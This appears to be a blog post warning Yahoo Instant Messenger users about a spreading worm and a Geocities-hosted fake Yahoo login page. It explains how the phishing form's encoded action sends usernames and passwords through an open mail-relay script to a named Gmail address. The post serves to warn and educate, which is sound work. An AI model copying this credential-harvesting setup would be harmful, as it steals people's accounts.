Be careful of Yahoo IM virus
If you’re using Yahoo Instant Messenger, beware of strange messages from friends or strangers. There’s a couple malicious things floating around that may trouble you.
The first is a worm virus, that sends a message with a malicious URL. Clicking on the URL will send you to a page that will install a custom web browser without permission, dropping an IE-like icon on the desktop. The start page will also be changed to point to a page with more malware, and when this custom browser is launched, as well as play strange music on computer startup. The virus attempts to propagate itself further in Yahoo chat.
However, there’s also a social engineering “virus” (if you can call it that) that’s going around, which works much simpler. You may get a message from someone on your buddy list, that has a message to check out a site, and a URL to visit on a Geocities site. I recently got one of these messages, so could dive into it in more detail.
This is brilliant for its simplicity. The page itself looks just like a standard Yahoo login. However, it’s not. Someone hosted a page on Geocities, emulating the Yahoo style, but with a different form action. The brilliance here is that there is no virus. It relies entirely on people’s trusting of the Yahoo brand, and their familiarity with logging into Yahoo. Even looking at the domain isn’t straightforward, because Yahoo owns Geocities. People who try to use this form are sending their username and password off to some third party. Let’s see if we can get any clues as to how it works.
The form action used was encoded using HTML escape sequences, but when translated, point to http://www2.fiberbit.net/form/mailto.cgi. Oops, looks like someone left a poorly coded script out there! Word to budding coders out there: if you write an email posting script, make sure to not allow arbitrary setting of addresses — it’s just asking for abuse.
The hidden attributes of this form are as follows:
So, by all appearances, by submitting this form, you are sending your Yahoo username and password to the address icewishart@gmail.com. They can then take your username and password and send off a message to people on your Yahoo buddy list, to try to get more usernames and passwords. Better change your Yahoo password if you’ve fallen for this!
While the first vulnerability is a legitimate and critical one, the second one underscores the importance of being careful with providing your information online. There’s a reason banks have started doing two factor security — they want you to be very aware of where you provide your information. When online, adopt an attitude of paranoia. You never know who is really sending you that message.
